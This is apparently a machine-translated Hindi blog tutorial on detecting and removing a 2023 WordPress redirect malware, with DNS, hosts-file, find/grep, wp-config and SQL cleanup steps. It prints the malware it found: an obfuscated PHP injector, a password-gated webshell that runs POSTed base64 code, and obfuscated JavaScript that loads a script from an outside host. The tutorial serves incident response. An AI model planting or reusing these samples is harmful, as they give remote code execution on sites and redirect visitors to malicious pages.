Fix Redirect WordPress Hack 2023 (रीडायरेक्ट वायरस)

WordPress यह निश्चित रूप से सबसे अधिक उपयोग किया जाने वाला प्लेटफ़ॉर्म है CMS (Content Management System) ब्लॉग और स्टार्टर ऑनलाइन स्टोर दोनों के लिए (मॉड्यूल के साथ)। WooCommerce), जो इसे कंप्यूटर हमलों (हैकिंग) द्वारा सबसे अधिक लक्षित बनाता है। सबसे अधिक उपयोग किए जाने वाले हैकिंग ऑपरेशनों में से एक का उद्देश्य हैक की गई वेबसाइट को अन्य वेब पेजों पर पुनर्निर्देशित करना है। Redirect WordPress Hack 2023 एक अपेक्षाकृत नया मैलवेयर है जो पूरी साइट को स्पैम वेब पेजों पर पुनर्निर्देशित कर सकता है या बदले में उपयोगकर्ताओं के कंप्यूटर को संक्रमित कर सकता है।

यदि आपकी साइट विकसित हुई है WordPress किसी अन्य साइट पर रीडायरेक्ट किया जाता है, तो संभवतः यह पहले से ही प्रसिद्ध रीडायरेक्ट हैक का शिकार है।

इस ट्यूटोरियल में आपको आवश्यक जानकारी और उपयोगी युक्तियाँ मिलेंगी जिनके द्वारा आप रीडायरेक्ट से संक्रमित वेबसाइट को डी-वायरस कर सकते हैं WordPress Hack (Virus Redirect). टिप्पणियों के माध्यम से आप अतिरिक्त जानकारी प्राप्त कर सकते हैं या सहायता मांग सकते हैं।

साइटों को पुनर्निर्देशित करने वाले वायरस का पता लगाना WordPress

वेबसाइट ट्रैफ़िक में अचानक और अनुचित कमी, ऑर्डर की संख्या में कमी (ऑनलाइन स्टोर के मामले में) या विज्ञापन राजस्व में कमी पहला संकेत है कि कुछ गलत है। पता लगा रहा है "Redirect WordPress Hack 2023(वायरस रीडायरेक्ट) "विज़ुअली" भी किया जा सकता है जब आप वेबसाइट खोलते हैं और आपको दूसरे वेब पेज पर रीडायरेक्ट कर दिया जाता है।

अनुभव से, अधिकांश वेब मैलवेयर इंटरनेट ब्राउज़र के साथ संगत हैं: Chrome, Firefox, Edge, Opera. अगर आप कंप्यूटर यूजर हैं Mac, ये वायरस वास्तव में ब्राउज़र में दिखाई नहीं देते हैं Safari. से सुरक्षा व्यवस्था Safari इन दुर्भावनापूर्ण स्क्रिप्टों को चुपचाप ब्लॉक करें।

यदि आपकी कोई वेबसाइट संक्रमित है तो क्या करें? Redirect WordPress Hack

मुझे आशा है कि पहला कदम घबराना या वेबसाइट को हटाना नहीं है। यहां तक ​​कि संक्रमित या वायरस वाली फाइलों को भी पहले डिलीट नहीं करना चाहिए। उनमें बहुमूल्य जानकारी होती है जो आपको यह समझने में मदद कर सकती है कि सुरक्षा उल्लंघन कहां है और वायरस पर क्या प्रभाव पड़ा। कार्य प्रणाली।

वेबसाइट को जनता के लिए बंद करें.

आप विज़िटरों के लिए किसी वायरस वेबसाइट को कैसे बंद करते हैं? सबसे सरल है DNS प्रबंधक का उपयोग करना और "ए" (डोमेन नाम) के लिए आईपी को हटाना या एक गैर-मौजूद आईपी को परिभाषित करना। इस प्रकार, वेबसाइट विज़िटर इससे सुरक्षित रहेंगे redirect WordPress hack जो उन्हें वायरस या स्पैम वेब पेजों पर ले जा सकता है।

यदि तुम प्रयोग करते हो CloudFlare एक DNS प्रबंधक के रूप में, आप खाते में लॉग इन करें और DNS रिकॉर्ड हटा दें "Aडोमेन नाम के लिए. इस प्रकार, वायरस से प्रभावित डोमेन आईपी के बिना रहेगा और इंटरनेट से एक्सेस नहीं किया जा सकेगा।

आप वेबसाइट के आईपी को कॉपी करें और उसे "रूट" करें ताकि केवल आप ही उस तक पहुंच सकें। अपने कंप्यूटर से।

कंप्यूटर पर किसी वेबसाइट का वास्तविक आईपी कैसे बदलें Windows?

इस पद्धति का उपयोग अक्सर "होस्ट" फ़ाइल को संपादित करके कुछ वेबसाइटों तक पहुंच को अवरुद्ध करने के लिए किया जाता है।

1. आप खोलें Notepad या अन्य पाठ संपादक (अधिकारों के साथ)। administrator) और फ़ाइल को संपादित करें "hosts". यह उसमें मौजूद है:

C:\Windows\System32\drivers\etc\hosts

2. "होस्ट" फ़ाइल में, अपनी वेबसाइट के वास्तविक आईपी में "रूट" जोड़ें। ऊपर DNS मैनेजर से आईपी हटा दिया गया।

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. फ़ाइल को सहेजें और ब्राउज़र में वेबसाइट तक पहुंचें।

यदि वेबसाइट नहीं खुलती है और आपने "होस्ट" फ़ाइल में कुछ भी गलत नहीं किया है, तो संभवतः यह DNS कैश है।

किसी ऑपरेटिंग सिस्टम पर DNS कैश को साफ़ करने के लिए Windows, खुला Command Prompt, जहां आप कमांड चलाते हैं:

ipconfig /flushdns

कंप्यूटर पर किसी वेबसाइट का वास्तविक आईपी कैसे बदलें Mac / Macकिताब?

कंप्यूटर उपयोगकर्ताओं के लिए Mac किसी वेबसाइट का वास्तविक आईपी बदलना कुछ हद तक आसान है।

1. उपयोगिता खोलें Terminal.

2. कमांड लाइन चलाएँ (चलाने के लिए सिस्टम पासवर्ड की आवश्यकता है):

sudo nano /etc/hosts

3. कंप्यूटर के समान Windows, डोमेन का वास्तविक आईपी जोड़ें।

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. परिवर्तन सहेजें. Ctrl+X (y).

आपके "रूटेड" होने के बाद, आप एकमात्र व्यक्ति हैं जो संक्रमित वेबसाइट तक पहुंच सकते हैं Redirect WordPress Hack.

संपूर्ण वेबसाइट बैकअप - फ़ाइलें और डेटाबेस

भले ही वह "संक्रमित" होredirect WordPress hack”, अनुशंसा पूरी वेबसाइट का सामान्य बैकअप बनाने की है। फ़ाइलें और डेटाबेस. संभवतः आप दोनों फ़ाइलों की एक स्थानीय प्रति भी सहेज सकते हैं public / public_html साथ ही डेटाबेस भी।

संक्रमित फ़ाइलों और उनके द्वारा संशोधित फ़ाइलों की पहचान Redirect WordPress Hack 2023

की मुख्य लक्ष्य फ़ाइलें WordPress देखते हैं index.php (जड़ में), header.php, index.php एसआई footer.php विषय का WordPress संपत्तियां। इन फ़ाइलों को मैन्युअल रूप से जांचें और दुर्भावनापूर्ण कोड या मैलवेयर स्क्रिप्ट की पहचान करें।

2023 में, " का एक वायरसRedirect WordPress Hack“डाल दो index.php फॉर्म का एक कोड:

(मैं इन कोड को चलाने की अनुशंसा नहीं करता!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

डिकोड किया गया, यह दुर्भावनापूर्ण स्क्रिप्ट यह मूलतः वेबसाइट के संक्रमित होने का परिणाम है WordPress. यह मैलवेयर के पीछे की स्क्रिप्ट नहीं है, यह वह स्क्रिप्ट है जो संक्रमित वेब पेज को रीडायरेक्ट करना संभव बनाती है। यदि हम उपरोक्त स्क्रिप्ट को डिकोड करते हैं, तो हमें मिलता है:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Fix Redirect WordPress Hack 2023
Fix Redirect WordPress Hack 2023

सर्वर पर उन सभी फ़ाइलों की पहचान करने के लिए जिनमें यह कोड है, पहुंच प्राप्त करना अच्छा है SSH फ़ाइल जाँच और प्रबंधन कमांड लाइन चलाने के लिए सर्वर पर Linux.

संबंधित: मदद से कैसे पता करें कि आपका ब्लॉग संक्रमित है या नहीं Google Search । (WordPress वाइरस)

नीचे दो कमांड दिए गए हैं जो हाल ही में संशोधित फ़ाइलों और एक निश्चित कोड (स्ट्रिंग) वाली फ़ाइलों की पहचान करने में निश्चित रूप से सहायक हैं।

आप आगे कैसे देखते हैं Linux PHP फ़ाइलें पिछले 24 घंटों या किसी अन्य समय सीमा में बदली गईं?

गण "find"उपयोग करना बहुत आसान है और समय अवधि, खोज का पथ और फ़ाइलों के प्रकार को निर्धारित करने के लिए अनुकूलन की अनुमति देता है।

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

आउटपुट में आपको फ़ाइल को संशोधित करने की तारीख और समय, लिखने/पढ़ने/निष्पादन अनुमतियों के बारे में जानकारी प्राप्त होगी (chmod) और यह किस समूह/उपयोगकर्ता से संबंधित है।

यदि आप अधिक दिन पहले जांचना चाहते हैं, तो मान बदलें "-mtime -1"या उपयोग करें"-mmin -360” मिनटों (6 घंटे) के लिए।

PHP, जावा फ़ाइलों के अंदर कोड (स्ट्रिंग) की खोज कैसे करें?

"खोज" कमांड लाइन जो आपको एक निश्चित कोड वाली सभी PHP या जावा फ़ाइलों को तुरंत ढूंढने की अनुमति देती है, इस प्रकार है:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

कमांड फाइलों को खोजेगा और प्रदर्शित करेगा .php एसआई .js युक्त "uJjBRODYsU".

ऊपर दिए गए दो कमांड की मदद से आप बहुत आसानी से पता लगा लेंगे कि कौन सी फाइलें हाल ही में संशोधित की गई हैं और कौन सी फाइलों में मैलवेयर कोड है।

सही कोड से समझौता किए बिना संशोधित फ़ाइलों से दुर्भावनापूर्ण कोड हटा देता है। मेरे परिदृश्य में, मैलवेयर खोलने से पहले रखा गया था <head>.

पहले "खोज" कमांड को निष्पादित करते समय, सर्वर पर नई फ़ाइलों की खोज करना बहुत संभव है, जो आपकी नहीं हैं WordPress न ही वहां आपके पास रखा है. वायरस प्रकार से संबंधित फ़ाइलें Redirect WordPress Hack.

जिस परिदृश्य में मैंने जांच की, फॉर्म की फाइलें "wp-log-nOXdgD.php". ये "स्पॉन" फ़ाइलें हैं जिनमें पुनर्निर्देशन के लिए वायरस द्वारा उपयोग किया जाने वाला मैलवेयर कोड भी होता है।

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

प्रकार की फ़ाइलों का उद्देश्य "wp-log-*"रीडायरेक्ट हैक वायरस को सर्वर पर होस्ट की गई अन्य वेबसाइटों पर फैलाना है। यह "" प्रकार का एक मैलवेयर कोड हैwebshell"ए से बना है मूल अनुभाग (जिसमें कुछ एन्क्रिप्टेड वेरिएबल परिभाषित हैं) और ओ निष्पादन अनुभाग जिसके माध्यम से हमलावर सिस्टम पर एक दुर्भावनापूर्ण कोड को लोड और निष्पादित करने का प्रयास करता है।

यदि कोई वेरिएबल है POST नामित 'bh' और इसका एन्क्रिप्टेड मान MD5 के बराबर है "8f1f964a4b4d8d1ac3f0386693d28d03", तो स्क्रिप्ट एन्क्रिप्टेड सामग्री लिखने लगती है base64 किसी अन्य वेरिएबल का जिसे 'कहा जाता हैb3' एक अस्थायी फ़ाइल में और फिर इस अस्थायी फ़ाइल को शामिल करने का प्रयास करता है।

यदि कोई वेरिएबल है POST या GET नामित 'tick', स्क्रिप्ट मूल्य के साथ प्रतिक्रिया देगी MD5 स्ट्रिंग का "885".

सर्वर पर उन सभी फ़ाइलों की पहचान करने के लिए जिनमें यह कोड है, एक स्ट्रिंग चुनें जो सामान्य है, फिर कमांड चलाएँ "find” (ऊपर वाले के समान)। इस मैलवेयर कोड वाली सभी फ़ाइलें हटा दें.

सुरक्षा खामी का फायदा उठाया गया Redirect WordPress Hack

सबसे अधिक संभावना यह है कि यह रीडायरेक्ट वायरस आता है प्रशासन उपयोगकर्ता का शोषण WordPress या एक की पहचान करके असुरक्षित प्लगइन जो उपयोगकर्ताओं को विशेषाधिकारों के साथ जोड़ने की अनुमति देता है administrator.

प्लेटफ़ॉर्म पर निर्मित अधिकांश वेबसाइटों के लिए WordPress यह संभव है थीम या प्लगइन फ़ाइलों का संपादनप्रशासन इंटरफ़ेस से (Dashboard). इस प्रकार, एक दुर्भावनापूर्ण व्यक्ति ऊपर दिखाई गई स्क्रिप्ट उत्पन्न करने के लिए थीम फ़ाइलों में मैलवेयर कोड जोड़ सकता है।

ऐसे मैलवेयर कोड का एक उदाहरण यह है:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript थीम हेडर में पहचाना गया WordPress, लेबल खोलने के तुरंत बाद <head>.

इस जावास्क्रिप्ट को समझना काफी मुश्किल है, लेकिन यह स्पष्ट है कि यह किसी अन्य वेब पते पर सवाल उठाता है जहां से यह फाइलें बनाने के लिए अन्य स्क्रिप्ट लाने की संभावना है।wp-log-*” जिसके बारे में मैंने ऊपर बात की थी।

इस कोड को सभी फ़ाइलों से ढूंढें और हटाएं PHP प्रभावित।

जहाँ तक मैं बता सकता हूँ, यह कोड था मैन्युअल रूप से जोड़ा गया प्रशासनिक विशेषाधिकारों वाले एक नये उपयोगकर्ता द्वारा.

इसलिए, डैशबोर्ड से मैलवेयर को जोड़ने से रोकने के लिए, संपादन विकल्प को अक्षम करना सबसे अच्छा है WordPress डैशबोर्ड से थीम्स/प्लगइन्स.

फ़ाइल संपादित करें wp-config.php और पंक्तियाँ जोड़ें:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

यह परिवर्तन करने के बाद कोई उपयोगकर्ता नहीं WordPress अब आप डैशबोर्ड से फ़ाइलें संपादित नहीं कर पाएंगे.

उपयोगकर्ताओं की भूमिका की जाँच करें Administrator

नीचे एक SQL क्वेरी है जिसका उपयोग आप भूमिका वाले उपयोगकर्ताओं को खोजने के लिए कर सकते हैं administrator मंच में WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

यह क्वेरी तालिका के सभी उपयोगकर्ताओं को लौटा देगी wp_users की भूमिका किसने सौंपी administrator. क्वेरी तालिका के लिए भी की जाती है wp_usermeta मेटा में खोजने के लिए 'wp_capabilities', जिसमें उपयोगकर्ता भूमिकाओं के बारे में जानकारी शामिल है।

एक अन्य तरीका उन्हें पहचानने का है: Dashboard → Users → All Users → Administrator. हालाँकि, ऐसी प्रथाएँ हैं जिनके द्वारा उपयोगकर्ता को डैशबोर्ड पैनल में छिपाया जा सकता है। तो, उपयोगकर्ताओं को देखने का सबसे अच्छा तरीका "Administrator"में WordPress ऊपर SQL कमांड है.

मेरे मामले में, मैंने डेटाबेस में "नाम वाले उपयोगकर्ता की पहचान की"wp-import-user". काफी विचारोत्तेजक.

WP मैलवेयर ख़राब उपयोगकर्ता
WP मैलवेयर ख़राब उपयोगकर्ता

साथ ही यहां से आप यूजर की तारीख और समय भी देख सकते हैं WordPress बनाया गया था। यूजर आईडी भी बहुत महत्वपूर्ण है क्योंकि यह सर्वर लॉग को खोजता है। इस तरह आप इस यूजर की सारी एक्टिविटी देख सकते हैं।

की भूमिका वाले उपयोगकर्ताओं को हटाएँ administrator तो फिर आप नहीं जानते पासवर्ड बदलें सभी प्रशासनिक उपयोगकर्ताओं के लिए. संपादक, लेखक, Administrator.

SQL डेटाबेस उपयोगकर्ता का पासवर्ड बदलें प्रभावित वेबसाइट का.

ये कदम उठाने के बाद वेबसाइट को सभी यूजर्स के लिए दोबारा शुरू किया जा सकता है।

हालाँकि, ध्यान रखें कि जो मैंने ऊपर प्रस्तुत किया है वह शायद उन हजारों परिदृश्यों में से एक है जिसमें एक वेबसाइट संक्रमित होती है Redirect WordPress Hack 2023 में।

यदि आपकी वेबसाइट संक्रमित हो गई है और आपको सहायता की आवश्यकता है या आपके कोई प्रश्न हैं, तो टिप्पणी अनुभाग खुला है।

प्रौद्योगिकी के प्रति जुनूनी होने के कारण मैं इस पर मजे से लिखता हूं StealthSettings2006 से .com। मुझे ऑपरेटिंग सिस्टम में व्यापक अनुभव है: macOS, Windows एसआई Linux, लेकिन प्रोग्रामिंग भाषाओं और ब्लॉगिंग प्लेटफ़ॉर्म में भी (WordPress) और ऑनलाइन स्टोर के लिए (WooCommerce, मैगेंटो, प्रेस्टाशॉप)।

कैसे करें » WordPress » Fix Redirect WordPress Hack 2023 (रीडायरेक्ट वायरस)
एक टिप्पणी छोड़ दो